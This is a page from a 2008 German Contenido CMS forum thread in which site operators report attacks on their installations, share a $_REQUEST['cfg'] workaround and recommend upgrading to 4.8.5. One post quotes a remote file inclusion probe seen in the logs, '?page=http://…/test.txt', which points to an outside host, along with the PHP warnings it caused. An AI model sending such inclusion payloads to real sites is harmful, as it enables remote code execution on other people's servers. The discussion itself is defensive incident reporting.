CONTENIDO Forum

Das Diskussionsforum zum Open Source Content Management System
https://forum.contenido.org/

Versuch zu Hacken?

https://forum.contenido.org/viewtopic.php?t=20128

Seite 3 von 5

Verfasst: Mo 16. Jun 2008, 19:25
von Faar
hier fanden heute Nacht auf ALLEN Contenido Projekten Angriffe statt:

session.inc on line 145
session.inc on line 193

mittels ereg_replace()

Hier würde ich mal

Code: Alles auswählen

if ( $_REQUEST['cfg'] ) { exit; }   // workaround remote hacking exploit
einsetzen so wie in
http://forum.contenido.org/viewtopic.ph ... c&start=15

beschrieben.

Die SQL-Injections kann ich auch nicht so schnell lösen, da dies etwas schwieriger scheint:
http://de.wikipedia.org/wiki/SQL-Injektion

Ansonsten hat Kummer in der ersten Seite hier etwas beschrieben, was er als Abhilfe programmiert hat.

...und ich dachte, es trifft immer nur "die Anderen" :(

Verfasst: Mo 16. Jun 2008, 19:27
von Faar
holger.librenz_4fb hat geschrieben:Es gibt eine endgülitge Lösung: Bitte auf die heute erschienene Version 4.8.5 aktualisieren!
Juchhu! :D

...allen Glücklichen die PHP 5 haben ;)

Verfasst: Mo 16. Jun 2008, 20:16
von stsofd
Faar hat geschrieben: Juchhu! :D

...allen Glücklichen die PHP 5 haben ;)
Warum???

Ich habe soeben das Update (vorerst nur in der angegriffenen Contenido-Installation) installiert. Da habe ich auch nur PHP 4.x.x
Es läuft (gefühlt) alles ohne Probleme.

DANKE für die schnelle Lösung!!!

Morgen wissen wir, ob es weitere Hack-Angriffe gibt...

Jetzt läuft erstmal der Ball...

Verfasst: Mo 16. Jun 2008, 20:25
von Faar
stsofd hat geschrieben: Ich habe soeben das Update (vorerst nur in der angegriffenen Contenido-Installation) installiert. Da habe ich auch nur PHP 4.x.x
Es läuft (gefühlt) alles ohne Probleme.

Jetzt läuft erstmal der Ball...
Super!
Das gibt einem auch das Gefühl, das richtige System gewählt zu haben.
Die Hacker schlafen scheinbar nicht...

...der (Fuß-) Ball rollt aber noch nicht recht :cry:

Verfasst: Mo 16. Jun 2008, 22:25
von holger.librenz_4fb
Faar hat geschrieben:
holger.librenz_4fb hat geschrieben:Es gibt eine endgülitge Lösung: Bitte auf die heute erschienene Version 4.8.5 aktualisieren!
Juchhu! :D

...allen Glücklichen die PHP 5 haben ;)
Na dann steht doch nach dem nicht so gloreichen, aber gott sei dank gewonnenen deutschen EM Spiel einem doppelten Update nichts im Wege. Keine Angst, PHP 5 beisst nicht :P

So long,
Holger

Verfasst: Di 17. Jun 2008, 06:48
von tinof
Hallo,

ok, also definitiv kein Bugfix mehr für die 4.6.23 ?

Schade, wir hatten das Projekt an dem Tag fertig, an dem die 4.8 herauskam...

Viele Grüße
Tino

Verfasst: Di 17. Jun 2008, 07:47
von holger.librenz_4fb
Doch, die 4.6.x wird noch ein wenig supported. Bugfixes kommen die Tage.

Allerdings ist ein Upgrade definitiv empfehlenswert....

So long,
Holger

Verfasst: Di 17. Jun 2008, 14:20
von Maribeauli
holger.librenz_4fb hat geschrieben:Es gibt eine endgülitge Lösung: Bitte auf die heute erschienene Version 4.8.5 aktualisieren!

So long,
Holger
Ist nur die Möglichkeit für den Angriff über contenido/b*****d_s****h.php (so wie er bei @faar erfolgte) gefixt oder auch alle anderen 18 Möglichkeiten über die verschiedenen Backend-Dateien ?

Verfasst: Di 17. Jun 2008, 14:23
von holger.librenz_4fb
Es ist mehr gefixed! Eindeutig mehr als "nur" dieses eine File.
Ich würde auch keine Sekunde zögern das Update durchzuführen, da die Lücken leider aktiv ausgenutzt werden...

So long,
Holger

Verfasst: Di 17. Jun 2008, 14:47
von Thorsten G.
--- gelöscht, das war Unsinn ---

Der Hinweis auf nicht zugestellte mails kam eben rein, die mails selbst wurden gestern abend schon versendet.

Upgrade wegen Hacker

Verfasst: Di 17. Jun 2008, 17:46
von Faar
holger.librenz_4fb hat geschrieben:Es ist mehr gefixed! Eindeutig mehr als "nur" dieses eine File.
Ich würde auch keine Sekunde zögern das Update durchzuführen, da die Lücken leider aktiv ausgenutzt werden...
Ich habe die Besucher-Statistik von einem Projekt durchgesehen und festgestellt, dass sehr zielgerichtet vorgegangen wurde: Alle möglichen Verzeichnisstrukturen die typisch für Contenido sind, wurden ausprobiert und generierten logischerweise meistens eine 404-Fehlerseite.
Dort wo der Pfad dann stimmte, klinkte sich der Hacker ein und versuchte mit verschiedenen Tricks, die php-Dateien zu knacken.

Ein russischer Rechner tat sich besonders in der Besuchsstatistik in der Hackerwelle seit Samstag 14.6. hervor, aber auch ungewöhnlich viele andere Besuche von verschiedenen Seiten/Rechnern fanden in der Zeit statt.
Das "Besuchsaufkommen" lag am WoE bis zum 8-fachen über dem Durchschnitt. Auch der Traffic stieg an, aber zum Glück nicht so weit, dass wir nachzahlen müssten... :shock:

Kurzum: da hat jemand Contenido in allen aktuell laufenden Versionen sehr genau studiert und seinen Angriff exakt darauf abgestimmt.
...guckt euch mal euer errorlog.txt an, da stehen sicher viele seltsame Dinge drin :)

Bei mir/uns läuft nun die aktuelle Version in der jeweiligen Seite und das mit mySQL 4. Fehler gab es bisher keine, nur mehr Speicherplatz wurde benötigt. Das Upgrade lief reibungsfrei per Mausklick :D

Verfasst: Di 17. Jun 2008, 19:59
von matt.loker
Mal eine Frage - ist Contenido mit MR genaus gefährdet wie Systeme ohne MR?

Verfasst: Di 17. Jun 2008, 20:14
von yodatortenboxer
Mal eine Frage - ist Contenido mit MR genaus gefährdet wie Systeme ohne MR?
Würde mich auch einmal interessieren. Ich benutze die 4.8.4 mit dem MR-Plugin und bei mir hat jemand versucht eine Seite mit

Code: Alles auswählen

?page=http://www.joerg-krug.de/docs/vnc/test.txt
dahinter aufzurufen, und da gab es vom MR jede Menge Fehler

Code: Alles auswählen

Warning: parse_url(/?page=http://www.joerg-krug.de/docs/vnc/test.txt) [function.parse-url]: Unable to parse URL in /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php on line 220

Warning: parse_url(/?page=http://www.joerg-krug.de/docs/vnc/test.txt) [function.parse-url]: Unable to parse URL in /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php on line 220

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 479

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 484

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 485

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 486

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 487

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 488

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/conlib/session.inc on line 489

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/cms/front_content.php on line 211

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/xtended-cooperation.de/httpdocs/contenido/plugins/mod_rewrite/classes/class.modrewritecontroller.php:220) in /var/www/vhosts/xtended-cooperation.de/httpdocs/cms/front_content.php on line 928
und scheinbar ist nichts passiert. Keine Ahnung ob das nun ein "einfacher" Hakerangriffversuch war.

Wer weis da genaueres?

Verfasst: Di 17. Jun 2008, 22:00
von Supporter
matt.loker hat geschrieben:Mal eine Frage - ist Contenido mit MR genaus gefährdet wie Systeme ohne MR?
Das ist in der Tat eine gute Frage - Wer hat darauf eine Antwort?

Verfasst: Di 17. Jun 2008, 22:12
von stsofd
Supporter hat geschrieben:...Contenido mit MR
Ich stehe gerade auf dem Schlauch und die Such hat nichts ergeben...

Was bitte bedeutet "MR" ?

Ich kann damit spontan nichts anfangen...
Alle Zeiten sind UTC+01:00
Seite 3 von 5

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de